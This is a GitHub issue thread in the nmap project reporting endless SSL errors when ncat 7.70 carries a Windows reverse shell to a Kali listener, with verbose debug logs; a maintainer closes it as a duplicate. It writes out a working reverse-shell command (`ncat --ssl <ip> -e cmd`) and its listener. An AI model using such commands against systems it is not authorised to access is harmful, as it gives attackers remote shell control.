### ISSUE TITLE
[ncat] SSL error when using reverse shell from linux to windows

### ISSUE THREAD

**Issue by schnippe** [nmap/nmap#1274] opened 2018-07-17 19:19 UTC
Hi, 
I use kali ncat 7.70 as a server (`ncat -l --ssl`) and windows ncat 7.70 as client (`ncat --ssl linux`)
ssl-encrypted chat seems to work fine.
A reverse shells opens to a prompt.
Entering `dir` produces endless `SSL error on X` on windows. 
Filetransfer from Linux to Windows works.
Filetranfer from Windows to Linux produces endless `SSL error on X` on linux. 

**Linux**
> `ncat -vvv -l --ssl`
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 9AC5 F2D1 B0A5 DCF7 F927 30F0 6013 3517 C025 FE62
NCAT DEBUG: Initialized fdlist with 103 maxfds
Ncat: Listening on :::31337
NCAT DEBUG: Added fd 3 to list, nfds 1, maxfd 3
Ncat: Listening on 0.0.0.0:31337
NCAT DEBUG: Added fd 4 to list, nfds 2, maxfd 4
NCAT DEBUG: Added fd 0 to list, nfds 3, maxfd 4
NCAT DEBUG: Initialized fdlist with 100 maxfds
NCAT DEBUG: selecting, fdmax 4
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 4 is ready
Ncat: Connection from 10.11.21.21.
NCAT DEBUG: Swapping fd[0] (3) with fd[2] (0)
NCAT DEBUG: Removed fd 3 from list, nfds 2, maxfd 4
NCAT DEBUG: Swapping fd[1] (4) with fd[1] (4)
NCAT DEBUG: Removed fd 4 from list, nfds 1, maxfd 0
Ncat: Connection from 10.11.21.21:49190.
NCAT DEBUG: Added fd 5 to list, nfds 2, maxfd 5
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: Added fd 5 to list, nfds 1, maxfd 5
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
`Microsoft Windows [Version 6.1.7601]`NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
:::
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
`Copyright (c) 2009 Microsoft Corporation.  All rights reserved.`NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
:::
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
:::
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
`C:\Users\Administrator\Desktop\Tools\nmap-7.70>`NCAT DEBUG: selecting, fdmax 5
`dir`
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 0 is ready
NCAT DEBUG: selecting, fdmax 5

**Windows**

>C:\Users\Administrator\Desktop\Tools\nmap-7.70>ncat -vvv --ssl 10.11.0.142 -e`cmd`
:::
Ncat: Version 7.70 ( https://nmap.org/ncat )
NCAT DEBUG: Using trusted CA certificates from C:\Users\Administrator\Desktop\To
ols\nmap-7.70\ca-bundle.crt.
NCAT DEBUG: Not doing certificate verification.
libnsock nsock_iod_new2(): nsock_iod_new (IOD #1)
libnsock nsock_connect_ssl(): SSL connection requested to 10.11.0.142:31337/tcp
(IOD #1) EID 9
Ncat: Subject: CN=localhost
Ncat: Issuer: CN=localhost
Ncat: SHA-1 fingerprint: 9AC5 F2D1 B0A5 DCF7 F927 30F0 6013 3517 C025 FE62
Ncat: Certificate verification failed (self signed certificate).
libnsock nsock_trace_handler_callback(): Callback: SSL-CONNECT SUCCESS for EID 9
 [10.11.0.142:31337]
Ncat: SSL connection to 10.11.0.142:31337.
Ncat: SHA-1 fingerprint: 9AC5 F2D1 B0A5 DCF7 F927 30F0 6013 3517 C025 FE62
libnsock nsock_iod_new2(): nsock_iod_new (IOD #2)
NCAT DEBUG: Executing: `cmd`
NCAT DEBUG: Creating named pipe "\\.\pipe\ncat-2888-0"
NCAT DEBUG: Register subprocess 000000E0 at index 0.
<... waiting for `dir` >
NCAT DEBUG: SSL error on 84: error:00000002:lib(0):func(0):system lib
NCAT DEBUG: SSL error on 84: error:00000002:lib(0):func(0):system lib
NCAT DEBUG: SSL error on 84: error:00000002:lib(0):func(0):system lib
NCAT DEBUG: SSL error on 84: error:00000002:lib(0):func(0):system lib
NCAT DEBUG: SSL error on 84: error:00000002:lib(0):func(0):system lib
continued...

**Comment by dmiller-nmap** [comment] 2018-07-19 20:05
Duplicate of #1267

**Comment by dmiller-nmap** [comment] 2018-07-19 20:06
Thanks for reporting. This was a helpful report, but we'll keep discussion in the original report, #1267.

**Closed by dmiller-nmap** 2018-07-19 20:05 UTC
